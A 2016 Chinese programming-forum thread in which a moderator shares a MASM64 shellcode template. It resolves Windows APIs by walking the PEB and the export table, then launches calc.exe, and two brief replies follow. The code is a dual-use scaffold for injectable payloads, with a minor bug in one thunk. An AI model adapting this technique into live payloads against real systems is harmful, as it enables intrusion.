技术宅的结界

 找回密码
 立即注册→加入我们

QQ登录

只需一步,快速开始

搜索
热搜: 下载 VB C 实现 编写
查看: 644|回复: 2
收起左侧

Masm64 shellcode template

[复制链接]

25

主题

81

帖子

1090

积分

用户组: 版主

UID
1821
精华
6
威望
57 点
宅币
834 个
贡献
31 次
宅之契约
0 份
在线时间
196 小时
注册时间
2016-7-12
发表于 2016-7-12 02:53:41 | 显示全部楼层 |阅读模式

欢迎访问技术宅的结界,请注册或者登录吧。

您需要 登录 才可以下载或查看,没有帐号?立即注册→加入我们

x
编译工具 vs或者ddk携带的汇编编译器ml64
[Asm] 纯文本查看 复制代码
option casemap:none 


;--------------------------------------------------------------------------------
;set name=Shellcode
;ml /c /coff /Cp /Fl /Gd /nologo %name%.asm
;link /SUBSYSTEM:CONSOLE /DEBUG /DEBUGTYPE:CV %name%.obj /OUT:%name%.exe
;PAUSE
;--------------------------------------------------------------------------------



  
include shellcode.inc
include macro.asm


.code SHELL
	jmp _main					;5
_thunk proc
	jmp QWORD ptr [rax]			;2
_thunk endp

CreateProcessA proc  
	call @F						;5
	_imp__CreateProcessA	QWORD offset _thunk__CreateProcessA	;8
@@:	
	pop rax						;1
	jmp _thunk					;2
CreateProcessA endp


CloseHandle proc
	call @F

	_imp__CloseHandle		QWORD offset _thunk__CloseHandle
@@:	
	pop rax
	jmp _thunk
CloseHandle endp

GetStartupInfo proc
	call @F
	_imp__GetStartupInfoA	QWORD offset _thunk__GetStartupInfo

@@:	
	pop rax
	jmp _thunk
GetStartupInfo endp


_KernelBase proc
	mov rax,(_TEB ptr gs:[0]).NtTib.Self
	mov rax,(_TEB ptr [rax]).ProcessEnvironmentBlock
	
	mov rax,(_PEB ptr [rax]).Ldr
	mov rax,(_PEB_LDR_DATA ptr [rax]).InInitializationOrderModuleList.Flink
	
	mov rdx,(_LIST_ENTRY ptr [rax]).Blink[SizeOf QWORD]	;ntdll	
	
	mov rax,(_LIST_ENTRY ptr [rax]).Flink
	mov rcx,(_LIST_ENTRY ptr [rax]).Blink[SizeOf QWORD];KERNELBASE
	
	
	mov rax,(_LIST_ENTRY ptr [rax]).Flink
	mov rax,(_LIST_ENTRY ptr [rax]).Blink[SizeOf QWORD];kenrl32
	
	ret
_KernelBase endp


_StrLen proc uses rdi rcx
	or rcx,-1
	mov rdi,rax
	xor rax,rax
	repne scasb
	not rcx
	mov rax,rcx
	ret
_StrLen endp

_StrCmp proc uses rcx rsi rdi
	
	mov rax,rsi
	call _StrLen
	
	mov rcx,rax
	
	mov rax,rdi
	call _StrLen
	
	cmp rax,rcx
	jnz @F 
		repe cmpsb
		mov rax,rcx
	@@:
	ret
	ret
_StrCmp endp

_GetProcAddress proc uses rsi rdi rbx
	mov rsi,rcx
	
	mov ax,(IMAGE_DOS_HEADER ptr [rsi]).e_magic
	
	cmp ax,"ZM"
	jz @F
	
		xor rax,rax
		jmp done
	
	@@:
	mov ebx,(IMAGE_DOS_HEADER ptr [rsi]).e_lfanew
	add rbx,rsi
	
	mov eax,(IMAGE_NT_HEADERS ptr [rbx]).Signature
	cmp eax,"EP"
	jz @F
		xor rax,rax
		jmp done
	@@:
	
	lea rbx,(IMAGE_NT_HEADERS ptr [rbx]).OptionalHeader
	
	mov ax,(_IMAGE_OPTIONAL_HEADER64 ptr [rbx]).Magic
	cmp ax,20Bh
	jz @F
		;PE 32
		xor rax,rax
		jmp done
	@@:
	
EXP EQU IMAGE_DIRECTORY_ENTRY_EXPORT*SizeOf _IMAGE_DATA_DIRECTORY	
	mov ebx,(_IMAGE_OPTIONAL_HEADER64 ptr [ebx]).DataDirectory[EXP][_IMAGE_DATA_DIRECTORY.VirtualAddress]
	
	add rbx,rcx
	
	
	mov r9d,(IMAGE_EXPORT_DIRECTORY ptr [rbx]).AddressOfNames
	add r9,rcx
	
	
	xor r8,r8
	
re:
	mov eax,[r9][r8*4]
	add rax,rcx
	
	mov si,[rax]
	
	
	cmp si,[rdx]
	jnz @F
	
	mov rsi,rax
	mov rdi,rdx
	call _StrCmp
	
	or rax,rax
	jnz @F
	
	mov edi,(IMAGE_EXPORT_DIRECTORY ptr [rbx]).AddressOfFunctions
	add rdi,rcx
	
	mov eax,(IMAGE_EXPORT_DIRECTORY ptr [rbx]).AddressOfNameOrdinals
	add rax,rcx
	
	movzx eax,word ptr [rax][r8*2]
	mov eax,[rdi][rax*4]
	add rax,rcx
	
	jmp done
	
	@@:
	inc r8
	cmp r8d,(IMAGE_EXPORT_DIRECTORY ptr [rbx]).NumberOfNames
	jb re
		
	xor rax,rax


done:		
	ret
_GetProcAddress endp


_thunk__CreateProcessA proc

	push r9
	push r8
	push rdx
	push rcx
	call _KernelBase	
	mov rcx,rax
	call @F	
	byte "CreateProcessA",0
	@@:
	pop rdx
	call _GetProcAddress
	
	mov _imp__CreateProcessA,rax
	
	pop rcx
	pop rdx
	pop r8
	pop r9
	push rax
	ret
_thunk__CreateProcessA endp


_thunk__CloseHandle proc
	push r9
	push r8
	push rdx
	push rcx
	call _KernelBase	
	mov rcx,rax
	call @F	
	byte "CloseHandle",0
	@@:
	pop rdx
	call _GetProcAddress
	
	mov _imp__CloseHandle,rax
	
	pop rcx
	pop rdx
	pop r8
	pop r9
	push rax
	ret
_thunk__CloseHandle endp


_thunk__GetStartupInfo proc
	push r9
	push r8
	push rdx
	push rcx
	call _KernelBase	
	mov rcx,rax
	call @F	
	byte "GetStartupInfoA",0
	@@:
	pop rdx
	call _GetProcAddress
	
	mov _imp__CloseHandle,rax
	
	pop rcx
	pop rdx
	pop r8
	pop r9
	push rax
	ret
_thunk__GetStartupInfo endp


_main proc uses rdi
	@LOCAL _si,STARTUPINFO
	@LOCAL _pi,PROCESS_INFORMATION
	END_LOCAL QWORD * 10
	
	and (STARTUPINFO ptr _si).cb,0
	
	
	fastcall CreateProcessA,rcx,0,0,0,0,0,0,0,addr _si,addr _pi
	
	or eax,eax
	jz @F
	
	fastcall CloseHandle,(PROCESS_INFORMATION ptr _pi).hThread
	
	fastcall CloseHandle,(PROCESS_INFORMATION ptr _pi).hProcess
	
	
	@@:
	EPILOG	
	ret
_main endp


.code




WinMainCRTStartup proc
	int 3	
	
	call @F
	byte "calc.exe",0
	@@:
	pop rcx
	int 3
	call _main
	
	int 3
	ret
WinMainCRTStartup endp


end

Shellcode.rar

7.06 KB, 下载次数: 2

评分

参与人数 1威望 +5 宅币 +10 贡献 +1 收起 理由
0xAA55 + 5 + 10 + 1 哇,提供了一堆有用的东西呢!.

查看全部评分

25

主题

81

帖子

1090

积分

用户组: 版主

UID
1821
精华
6
威望
57 点
宅币
834 个
贡献
31 次
宅之契约
0 份
在线时间
196 小时
注册时间
2016-7-12
 楼主| 发表于 2016-7-12 03:08:10 | 显示全部楼层
有bug反馈,不定时间处理

85

主题

263

帖子

3513

积分

用户组: 管理员

No. 418

UID
418
精华
13
威望
52 点
宅币
1969 个
贡献
1112 次
宅之契约
0 份
在线时间
252 小时
注册时间
2014-8-9
发表于 2016-7-12 19:10:47 | 显示全部楼层
支持Ayala!
In the beginning I was not the best.
And the world was also not the best.
But I still know that I am who I am.
Because I think that it is good.
I have been working hard.
I have been keeping growth with the world.
And it was so.
回复

使用道具 举报

本版积分规则

QQ|申请友链|Archiver|手机版|小黑屋|技术宅的结界 ( 滇ICP备16008837号|网站地图

GMT+8, 2018-9-24 08:18 , Processed in 0.115067 second(s), 38 queries , Gzip On.

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表